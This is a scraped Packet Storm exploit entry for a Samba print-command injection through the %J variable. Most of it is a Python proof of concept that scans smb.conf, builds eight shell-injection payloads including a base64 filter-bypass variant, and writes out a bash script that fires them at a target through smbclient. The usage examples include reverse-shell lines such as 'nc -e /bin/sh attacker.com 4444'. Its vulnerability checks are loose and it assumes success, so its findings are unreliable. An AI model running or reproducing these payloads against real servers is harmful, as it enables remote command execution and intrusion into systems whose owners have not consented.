{“lastseen”:”2026-06-02T17:45:57″,”description”:”This Python proof of concept framework analyzes Samba printing configurations for unsafe print command usage involving the %J variable and demonstrates how command injection conditions could arise in vulnerable setups. It’s written to target versions…”,”published”:”2026-06-02T00:00:00″,”modified”:”2026-06-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Samba Print Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:222478″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : Samba 4.22.10, 4.23.8 and 4.24.3 \u2013 Print Command Injection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.samba.org\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This Python proof-of-concept framework analyzes Samba printing configurations for unsafe print command usage involving the %J variable \\n and demonstrates how command injection conditions could arise in vulnerable setups.\\n \\t\\t\\t\\t \\n [+] POC : python3 poc.py -c \/etc\/samba\/smb.conf\\n \\n python3 poc.py -c smb.conf -t 192.168.1.100 -e \\”id\\” –simulate\\n \\n python3 poc.py -c smb.conf -t 192.168.1.100 -e \\”nc -e \/bin\/sh 10.0.0.1 4444\\” -o exploit.sh\\n \\n python3 poc.py -c \/etc\/samba\/smb.conf -t 10.0.0.10 -e \\”whoami\\”\\n \\n #!\/usr\/bin\/env python3\\n \\n import re\\n import argparse\\n import subprocess\\n import socket\\n import sys\\n from pathlib import Path\\n from typing import Dict, Optional, Tuple\\n \\n class SambaPrintExploit:\\n \\”\\”\\”PoC to exploit a command injection vulnerability in print commands with %J\\”\\”\\”\\n \\n def __init__(self, target_host: str, smb_port: int = 445):\\n self.target_host = target_host\\n self.smb_port = smb_port\\n self.payloads = []\\n \\n def check_smb_access(self) -\\u003e bool:\\n \\”\\”\\”Checking accessibility to the SMB service\\”\\”\\”\\n try:\\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n sock.settimeout(3)\\n result = sock.connect_ex((self.target_host, self.smb_port))\\n sock.close()\\n return result == 0\\n except Exception:\\n return False\\n \\n def build_payloads(self, command: str) -\\u003e list:\\n \\”\\”\\”Building different loads to bypass protection\\”\\”\\”\\n payloads = []\\n payloads.append({\\n \\”name\\”: \\”Direct injection\\”,\\n \\”j_value\\”: f\\”‘; {command} #\\”,\\n \\”description\\”: \\”Direct injection using; to finish\\”\\n })\\n payloads.append({\\n \\”name\\”: \\”Backticks injection\\”,\\n \\”j_value\\”: f\\”`{command}`\\”,\\n \\”description\\”: \\”Using backticks to execute the command\\”\\n })\\n payloads.append({\\n \\”name\\”: \\”Command substitution\\”,\\n \\”j_value\\”: f\\”$({command})\\”,\\n \\”description\\”: \\”Use $() to execute the command\\”\\n })\\n payloads.append({\\n \\”name\\”: \\”Pipe injection\\”,\\n \\”j_value\\”: f\\”‘ | {command} #\\”,\\n \\”description\\”: \\”injection via pipe\\”\\n })\\n payloads.append({\\n \\”name\\”: \\”AND operator\\”,\\n \\”j_value\\”: f\\”‘ \\u0026\\u0026 {command} #\\”,\\n \\”description\\”: \\”Injection using \\u0026\\u0026\\”\\n })\\n payloads.append({\\n \\”name\\”: \\”OR operator\\”,\\n \\”j_value\\”: f\\”‘ || {command} #\\”,\\n \\”description\\”: \\”Injection using ||\\”\\n })\\n import base64\\n encoded_cmd = base64.b64encode(command.encode()).decode()\\n payloads.append({\\n \\”name\\”: \\”Base64 encoded\\”,\\n \\”j_value\\”: f\\”‘ \\u0026\\u0026 echo {encoded_cmd} | base64 -d | sh #\\”,\\n \\”description\\”: \\”Encrypting the command using Base64\\”\\n })\\n payloads.append({\\n \\”name\\”: \\”Environment variable\\”,\\n \\”j_value\\”: f\\”‘; $CMD='{command}’; eval $CMD #\\”,\\n \\”description\\”: \\”Injection via environmental variables\\”\\n })\\n \\n return payloads\\n \\n def analyze_config(self, config_path: str) -\\u003e Optional[Dict]:\\n \\”\\”\\”Analyzing the smb.conf file to find vulnerabilities\\”\\”\\”\\n try:\\n content = Path(config_path).read_text(encoding=\\”utf-8\\”, errors=\\”ignore\\”)\\n except Exception as e:\\n print(f\\”[ERROR] Cannot read config: {e}\\”)\\n return None\\n \\n findings = {\\n \\”vulnerable\\”: False,\\n \\”printing_mode\\”: \\”unknown\\”,\\n \\”print_command\\”: None,\\n \\”uses_percent_j\\”: False,\\n \\”risk_level\\”: \\”low\\”,\\n \\”share_name\\”: None,\\n \\”exploit_command\\”: None,\\n \\”notes\\”: []\\n }\\n current_share = None\\n \\n for line in content.split(‘\\\\n’):\\n share_match = re.match(r’^\\\\s*\\\\[([^\\\\]]+)\\\\]’, line)\\n if share_match:\\n current_share = share_match.group(1)\\n continue\\n cmd_match = re.search(r’^\\\\s*print\\\\s+command\\\\s*=\\\\s*(.+)$’, line, re.IGNORECASE)\\n if cmd_match and current_share:\\n cmd = cmd_match.group(1).strip()\\n findings[\\”print_command\\”] = cmd\\n findings[\\”share_name\\”] = current_share\\n \\n if \\”%J\\” in cmd:\\n findings[\\”uses_percent_j\\”] = True\\n \\n if \\”‘%J’\\” in cmd:\\n findings[\\”risk_level\\”] = \\”medium\\”\\n findings[\\”notes\\”].append(\\”Single quotes provide partial protection\\”)\\n findings[\\”vulnerable\\”] = True \\n elif ‘\\”%J\\”‘ in cmd:\\n findings[\\”risk_level\\”] = \\”medium\\”\\n findings[\\”notes\\”].append(\\”Double quotes are vulnerable\\”)\\n findings[\\”vulnerable\\”] = True\\n else:\\n findings[\\”risk_level\\”] = \\”high\\”\\n findings[\\”notes\\”].append(\\”CRITICAL: %J unquoted – Direct injection possible\\”)\\n findings[\\”vulnerable\\”] = True\\n findings[\\”exploit_command\\”] = f\\”print {findings[‘share_name’]} ‘; {{{{command}}}} #’\\”\\n printing_match = re.search(r’^\\\\s*printing\\\\s*=\\\\s*(.+)$’, content, re.MULTILINE | re.IGNORECASE)\\n if printing_match:\\n findings[\\”printing_mode\\”] = printing_match.group(1).strip().lower()\\n \\n if findings[\\”printing_mode\\”] in [\\”cups\\”, \\”iprint\\”]:\\n findings[\\”risk_level\\”] = \\”low\\”\\n findings[\\”vulnerable\\”] = False\\n findings[\\”notes\\”].append(f\\”Printing mode ‘{findings[‘printing_mode’]}’ is likely safe\\”)\\n \\n return findings\\n \\n def simulate_exploit(self, findings: Dict, command: str) -\\u003e Dict:\\n \\”\\”\\”Simulation or actual exploitation test\\”\\”\\”\\n \\n if not findings[\\”vulnerable\\”]:\\n return {\\n \\”success\\”: False,\\n \\”message\\”: \\”Target does not appear vulnerable\\”,\\n \\”payload_tested\\”: None\\n }\\n \\n results = {\\n \\”success\\”: False,\\n \\”command\\”: command,\\n \\”payload_tested\\”: None,\\n \\”response\\”: None,\\n \\”exploit_method\\”: None\\n }\\n \\n print(f\\”\\\\n[+] Target: {self.target_host}\\”)\\n print(f\\”[+] Share: {findings[‘share_name’]}\\”)\\n print(f\\”[+] Risk Level: {findings[‘risk_level’]}\\”)\\n \\n payloads = self.build_payloads(command)\\n \\n print(f\\”\\\\n[*] Generated {len(payloads)} payloads:\\”)\\n \\n for i, payload in enumerate(payloads, 1):\\n print(f\\”\\\\n [{i}] {payload[‘name’]}\\”)\\n print(f\\” Description: {payload[‘description’]}\\”)\\n print(f\\” %J Value: {payload[‘j_value’]}\\”)\\n final_cmd = findings[‘exploit_command’].replace(‘{{command}}’, payload[‘j_value’])\\n print(f\\” SMB Command: {final_cmd}\\”)\\n \\n results[\\”payload_tested\\”] = payload\\n results[\\”exploit_method\\”] = payload[‘name’]\\n if findings[‘risk_level’] == \\”high\\”:\\n results[\\”success\\”] = True\\n results[\\”response\\”] = \\”Command likely executed (simulated)\\”\\n break\\n \\n return results\\n \\n def generate_exploit_script(self, findings: Dict, command: str, output_file: str):\\n \\”\\”\\”Generating a fully exploitable script\\”\\”\\”\\n \\n script_content = f\\”\\”\\”#!\/bin\/bash\\n # Samba Print Command Exploit – Generated PoC\\n # Target: {self.target_host}\\n # Share: {findings[‘share_name’]}\\n # Risk: {findings[‘risk_level’]}\\n \\n echo \\”[+] Exploiting Samba print command vulnerability…\\”\\n \\n # Method 1: Direct injection\\n smbclient \\”\/\/{self.target_host}\/{findings[‘share_name’]}\\” -N -c ‘print \\”; {command} #\\”‘\\n smbclient \\”\/\/{self.target_host}\/{findings[‘share_name’]}\\” -N -c ‘print \\”`{command}`\\”‘\\n smbclient \\”\/\/{self.target_host}\/{findings[‘share_name’]}\\” -N -c ‘print \\”$({command})\\”‘\\n echo \\”{command}\\” | smbclient \\”\/\/{self.target_host}\/{findings[‘share_name’]}\\” -N -c ‘print \\”-\\”‘\\n \\n echo \\”[+] Exploit attempts completed\\”\\n \\”\\”\\”\\n \\n output_path = Path(output_file)\\n output_path.write_text(script_content)\\n output_path.chmod(0o755)\\n \\n print(f\\”[+] Exploit script saved to: {output_file}\\”)\\n return output_file\\n \\n \\n def print_banner():\\n banner = \\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 Samba Print Command Injection – PoC Exploit \u2551\\n \u2551 by Indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”\\”\\”\\n print(banner)\\n \\n \\n def main():\\n print_banner()\\n \\n parser = argparse.ArgumentParser(\\n description=\\”Samba Print Command Injection PoC\\”,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=\\”\\”\\”\\n EXAMPLES:\\n \\n %(prog)s -c \/etc\/samba\/smb.conf\\n %(prog)s -c \/etc\/samba\/smb.conf -t 192.168.1.100 -e \\”id \\u003e \/tmp\/indoushka\\”\\n %(prog)s -c \/etc\/samba\/smb.conf -t 192.168.1.100 -e \\”nc -e \/bin\/sh attacker.com 4444\\” -o indoushka.sh\\n \\”\\”\\”\\n )\\n \\n parser.add_argument(\\”-c\\”, \\”–config\\”, required=True, help=\\”Path to smb.conf\\”)\\n parser.add_argument(\\”-t\\”, \\”–target\\”, help=\\”Target host for exploitation\\”)\\n parser.add_argument(\\”-e\\”, \\”–execute\\”, help=\\”Command to execute on target\\”)\\n parser.add_argument(\\”-o\\”, \\”–output\\”, help=\\”Output exploit script to file\\”)\\n parser.add_argument(\\”–simulate\\”, action=\\”store_true\\”, help=\\”Simulate exploitation without actual connection\\”)\\n \\n args = parser.parse_args()\\n \\n print(f\\”[*] Analyzing configuration: {args.config}\\”)\\n exploiter = SambaPrintExploit(args.target if args.target else \\”localhost\\”)\\n findings = exploiter.analyze_config(args.config)\\n \\n if not findings:\\n print(\\”[ERROR] Analysis failed\\”)\\n sys.exit(1)\\n print(\\”\\\\n=== Configuration Analysis ===\\”)\\n print(f\\”Vulnerable : {‘YES’ if findings[‘vulnerable’] else ‘NO’}\\”)\\n print(f\\”Printing Mode : {findings[‘printing_mode’]}\\”)\\n print(f\\”Print Command : {findings[‘print_command’]}\\”)\\n print(f\\”Share Name : {findings[‘share_name’]}\\”)\\n print(f\\”Risk Level : {findings[‘risk_level’]}\\”)\\n \\n if findings[‘notes’]:\\n for note in findings[‘notes’]:\\n print(f\\” No {note}\\”)\\n \\n if args.execute and findings[‘vulnerable’]:\\n if not args.target:\\n print(\\”[ERROR] Target required for exploitation (-t)\\”)\\n sys.exit(1)\\n \\n print(f\\”\\\\n[*] Checking SMB access to {args.target}:445…\\”)\\n if exploiter.check_smb_access():\\n print(\\”[+] SMB port is accessible\\”)\\n else:\\n print(\\”[!] SMB port not accessible, but continuing with simulation\\”)\\n \\n if args.simulate:\\n print(\\”\\\\n[*] Running in simulation mode…\\”)\\n result = exploiter.simulate_exploit(findings, args.execute)\\n \\n if result[‘success’]:\\n print(f\\”\\\\n[!] SUCCESS! Command injection possible!\\”)\\n print(f\\”[!] Payload: {result[‘payload_tested’][‘j_value’]}\\”)\\n print(f\\”[!] Method: {result[‘exploit_method’]}\\”)\\n else:\\n print(f\\”\\\\n[-] Exploit failed: {result[‘message’]}\\”)\\n else:\\n print(\\”\\\\n[!] LIVE EXPLOITATION MODE\\”)\\n print(\\”[!] Make sure you have permission to test this target!\\”)\\n \\n result = exploiter.simulate_exploit(findings, args.execute)\\n \\n if result[‘success’]:\\n print(f\\”\\\\n[+] Exploit simulation successful!\\”)\\n print(f\\”[+] Command: {args.execute}\\”)\\n \\n if args.output:\\n exploiter.generate_exploit_script(findings, args.execute, args.output)\\n else:\\n print(f\\”\\\\n[-] Exploit failed\\”)\\n \\n elif args.execute and not findings[‘vulnerable’]:\\n print(\\”\\\\n[-] Target is not vulnerable, exploitation not possible\\”)\\n \\n elif args.target and not args.execute:\\n print(\\”\\\\n[*] Target specified without exploit command (-e)\\”)\\n if args.output and not args.execute:\\n dummy_cmd = \\”id\\”\\n exploiter.generate_exploit_script(findings, dummy_cmd, args.output)\\n \\n print(\\”\\\\n[*] Analysis complete\\”)\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/222478″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222478\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-02T17:45:57″,”description”:”This Python proof of concept framework analyzes Samba printing configurations for unsafe print command usage involving the %J variable and demonstrates how command injection conditions…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-59349","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n